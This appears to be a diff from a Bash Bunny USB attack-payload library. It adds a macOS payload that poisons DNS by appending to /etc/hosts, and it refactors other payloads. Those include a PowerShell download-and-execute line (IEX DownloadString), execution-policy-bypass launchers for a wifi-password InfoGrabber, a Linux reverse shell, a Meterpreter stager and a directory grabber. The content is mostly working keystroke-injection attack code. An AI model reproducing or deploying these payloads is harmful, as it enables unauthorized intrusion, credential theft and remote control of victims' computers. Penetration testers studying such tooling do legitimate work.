+# DNS Poisoning Attack Mac
+
+## Description
+
+Redirects a domain to a set IP adres by changing the hosts file.
+
+## Configuration
+
+Change the domain you want to redirect and the IP you want to direct it to.

payloads/library/phishing/dns_poisoning_mac/payload.txt

@@ -0,0 +1,23 @@
+#Title: DNS Poisoning Mac
+#Description: Attacks the host file to redirect a website of your chosing for a given domain
+#Author: thehappydinoa
+#Target: OS X
+
+LED R 200
+
+ATTACKMODE HID
+LED STAGE1
+Q DELAY 400
+Q GUI SPACE
+Q DELAY 300
+Q STRING terminal
+Q DELAY 200
+Q ENTER
+Q DELAY 400
+Q STRING 'echo 10.1.1.0 test.com>>/etc/hosts'
+Q DELAY 50
+Q ENTER
+Q STRING exit
+Q ENTER
+
+LED FINISH

payloads/library/prank/RickRoll/payload.txt

@@ -11,24 +11,27 @@
 # Green..............RickRoll Started, Safe to pull
 
 
-LED B 200
+LED SETUP
+GET SWITCH_POSITION
+
+LED STAGE1
 ATTACKMODE HID
 Q GUI r
 Q STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet){ IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/RR.ps1');exit}}\""
 Q DELAY 300
 Q ENTER
 
-
+LED STAGE2
 ATTACKMODE RNDIS_ETHERNET
-source bunny_helpers.sh
 payload_dir=/root/udisk/payloads/$SWITCH_POSITION
 cd $payload_dir
-LED R G B 200
+LED ATTACK
 iptables -A OUTPUT -p udp --dport 53 -j DROP
 python -m SimpleHTTPServer 80 &
 pid=$!
 while ! nc -z localhost 80; do sleep 0.2; done
 sleep 3
-LED G 200
+
+LED FINISH
 kill -9 $pid
 exit

payloads/library/prank/macDesktop/macWallpaper.sh

@@ -1,25 +1,26 @@
 pid=$$
 touch /tmp/$pid
+cd /tmp/
 for (( i=0; i < 5; ++i ))
 do
   if [ ! -e /tmp/1.jpg ]; then
-    wget "http://www.hdwallpapers.in/walls/my_little_pony_the_movie_4k-wide.jpg" -O "/tmp/1.jpg";
+    curl -0 1.jpg "http://www.hdwallpapers.in/walls/my_little_pony_the_movie_4k-wide.jpg";
   fi
 
   if [ ! -e /tmp/2.jpg ]; then
-    wget "http://wallpapersafari.com/download/rzbCmJ/" -O "/tmp/2.jpg";
+    curl -0 2.jpg "http://wallpapersafari.com/download/rzbCmJ/";
   fi
 
   if [ ! -e /tmp/3.jpg ]; then
-    wget "https://images3.alphacoders.com/152/152507.jpg" -O "/tmp/3.jpg";
+    curl -0 3.jpg "https://images3.alphacoders.com/152/152507.jpg";
   fi
 
   if [ ! -e /tmp/4.jpg ]; then
-    wget "https://images3.alphacoders.com/152/152475.jpg" -O "/tmp/4.jpg";
+    curl -0 4.jpg "https://images3.alphacoders.com/152/152475.jpg";
   fi
 
   if [ ! -e /tmp/5.jpg ]; then
-    wget "http://fanaru.com/my-little-pony-friendship-is-magic/image/56392-my-little-pony-friendship-is-magic-rarity-lineart.png" -O "/tmp/5.jpg";
+    curl -0 5.jpg "http://fanaru.com/my-little-pony-friendship-is-magic/image/56392-my-little-pony-friendship-is-magic-rarity-lineart.png";
   fi
 
   let number="$RANDOM % 5 + 1 | bc"

payloads/library/prank/win93/payload.txt

@@ -78,7 +78,6 @@ if [ "$OS" = "MAC" ]; then
     RUN OSX "terminal"
     QUACK STRING "open \"http://www.windows93.net\" && osascript -e \"sleep 3;ccf;\";"
 elif [ "$OS" = "LINUX" ]; then
-    DUCKY_LANG fr
     RUN UNITY "xterm"
     QUACK STRING "chromium-browser --start-fullscreen --incognito --new-window http://www.windows93.net &; exit;"
     QUACK ENTER

payloads/library/recon/InfoGrabber/payload.txt

@@ -10,34 +10,14 @@
 # the computer running and will also get wifi passwords
 
 
-LED R B 100
+LED SETUP
 ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
 
-#Check swith copied from bunny_helper
-
-check_switch() {
-	switch1=`cat /sys/class/gpio_sw/PA8/data`
-	switch2=`cat /sys/class/gpio_sw/PL4/data`
-	switch3=`cat /sys/class/gpio_sw/PL3/data`
-	if [ "x$switch1" = "x0" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x1" ]; then
-		SWITCH_POSITION="switch1"
-	elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x0" ] && [ "x$switch3" = "x1" ]; then
-		SWITCH_POSITION="switch2"
-	elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x0" ]; then
-		SWITCH_POSITION="switch3"
-	else
-		SWITCH_POSITION="invalid"
-	fi
-}
-
-check_switch
-
-# Set your language here
-QUACK SET_LANGUAGE no
+LED ATTACK
 QUACK GUI r
 QUACK DELAY 200
 # Open run and run the run.ps1 script in the Bashbunny
 QUACK STRING powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
 QUACK ENTER
-LED G
-#Green means good to go
+LED FINISH

payloads/library/recon/Link File analysis/payload.txt

@@ -1,12 +0,0 @@
-
-
-
-LED R B 100
-ATTACKMODE HID STORAGE
-
-
-DUCKY_LANG gb
-LED B
-RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
-LED G FAST
-#Green means good to go

payloads/library/recon/Link_File_analysis/payload.txt

@@ -1,12 +1,7 @@
-
-
-
-LED R B 100
+LED SETUP
 ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
 
-
-DUCKY_LANG gb
-LED B
+LED ATTACK
 RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
-LED G FAST
-#Green means good to go
+LED FINISH

payloads/library/recon/PrivEscChecker/payload.txt

@@ -15,10 +15,8 @@
 # Green..............Found Possible Privilege Escalation
 # Red................No Possible Privilege Escalation
 
-# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
-source bunny_helpers.sh
-
-LED R 200
+LED SETUP
+GET SWITCH_POSITION
 LOOTDIR=/root/udisk/loot/PrivEscChecker
 mkdir -p $LOOTDIR
 #cleanup any prior unfinished payloads
@@ -26,7 +24,7 @@ rm $LOOTDIR/DONE
 rm $LOOTDIR/OUTPUT
 
 ATTACKMODE HID STORAGE
-LED B 200
+LED ATTACK
 
 # wait 6 seconds for the storage to popup, then open powershell and get bunny drive letter
 Q DELAY 6000
@@ -68,7 +66,7 @@ Q ENTER
 
 sync
 #remount the drive and check results
-LED R B 200
+LED CLEANUP
 sleep 1
 # Wait for the DONE file to be created so we know powershell is finished
 LOOTDIR=/root/udisk/loot/PrivEscChecker
@@ -84,7 +82,7 @@ rm -f $DONEFILE
 
 # Check OUTPUT.txt for any missing patches
 if grep -lq 'Appears Vulnerable' $LOOTDIR/$DIR/OUTPUT.txt; then
-  LED G 200
+  LED FINISH
 else
-  LED R
+  LED FAIL
 fi

payloads/library/remote_access/LinuxReverseShell/payload.txt

@@ -17,6 +17,9 @@ RPORT=4444
 # Start Setup
 LED SETUP
 
+# Gets Switch Position
+GET SWITCH_POSITION
+
 # Set Attack Mode
 ATTACKMODE HID STORAGE
 

payloads/library/remote_access/NothingLess/payload.txt

@@ -12,10 +12,10 @@
 # For testing use: 'icacls "c:\Users" /remove:g Everyone /T' to remove the created security permissions
 # To share a drive change the path in nl.cmd to c: remove the quotes
 
-LED R 200
+LED SETUP
+GET SWITCH_POSITION
 
-# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
-source bunny_helpers.sh
+LED STAGE1
 
 ATTACKMODE HID
 
@@ -30,12 +30,12 @@ Q DELAY 1000
 Q LEFT
 Q ENTER
 
-LED R G 200
+LED STAGE2
 
 ATTACKMODE HID STORAGE
 
 # Start nl.cmd
-Q STRING ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\nl.cmd')"
+Q STRING ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\${SWITCH_POSITION}\nl.cmd')"
 Q ENTER
 
 # Wait for nl.cmd and exit
@@ -45,4 +45,4 @@ Q ENTER
 
 sync
 
-LED G
+LED FINISH

payloads/library/remote_access/USB_Intruder/payload.txt

@@ -17,12 +17,13 @@
 #Green - Attack Completion
 
 #Initialization - Setting AttackModes
-LED W
+LED SETUP
 ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
 #Initialization Completed
 
 #Beginning of HID/STORAGE Phase
-LED B 10
+LED ATTACK
 #Description::
 Q DELAY 2000
 Q GUI d
@@ -61,7 +62,7 @@ Q DELAY 500
 #End of HID/STORAGE Phase
 
 #Cleanup
-LED Y 100
+LED CLEANUP
 #Clears complete run history
 Q GUI r
 Q DELAY 500
@@ -70,7 +71,6 @@ Q ENTER
 #End of Cleanup
 
 #Completion of script
-LED G 100
 sync
-LED G
+LED FINISH
 #Completed

payloads/library/remote_access/Win_x64_JS_Rev_Meter/payload.txt

@@ -3,7 +3,6 @@ LED G
 REM set attackmode to HID device
 ATTACKMODE HID
 REM set keyboard
-DUCKY_LANG us
 REM open run menu
 Q GUI r
 Q DELAY 1000

payloads/library/remote_access/WindowsMeterpreterStaged/payload.txt

@@ -29,20 +29,19 @@
 #         Red: failure to load dependency ducky script
 #
 
+LED SETUP
+
+GET SWITCH_POSITION
 
 ATTACKMODE HID
 
-LED R G 200
-
-LANGUAGE='us'
-
-source bunny_helpers.sh
+LED ATTACK
 
 if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky.txt" ]; then
         QUACK ${SWITCH_POSITION}/windows-staged-meterpreter.txt
-        LED G
+        LED FINISH
 else
-    LED R
+    LED FAIL
     echo "Unable to load dwindows-staged-meterpreter.txt" >> /root/debuglog.txt
         exit 1
 fi

payloads/library/sFTP Directory Grabber/payload.txt

@@ -22,10 +22,9 @@
 #64-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w64/psftp.exe
 #Once downloaded, please copy psFTP.exe to the root of the bash bunny before attempting to use this payload.
 #
-# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
-source bunny_helpers.sh
 
-LED R
+LED SETUP
+GET SWITCH_POSITION
 ATTACKMODE HID STORAGE
 QUACK GUI r
 QUACK DELAY 100
@@ -33,4 +32,4 @@ QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'pa
 QUACK ENTER
 
 # Green LED for finished
-LED G
+LED FINISH